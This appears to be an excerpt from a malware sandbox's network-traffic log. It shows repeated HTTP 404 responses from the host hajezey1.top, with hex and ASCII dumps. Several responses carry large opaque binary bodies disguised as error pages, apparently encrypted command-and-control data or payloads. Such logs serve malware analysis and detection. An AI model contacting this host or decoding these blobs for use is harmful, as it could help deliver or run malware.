Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
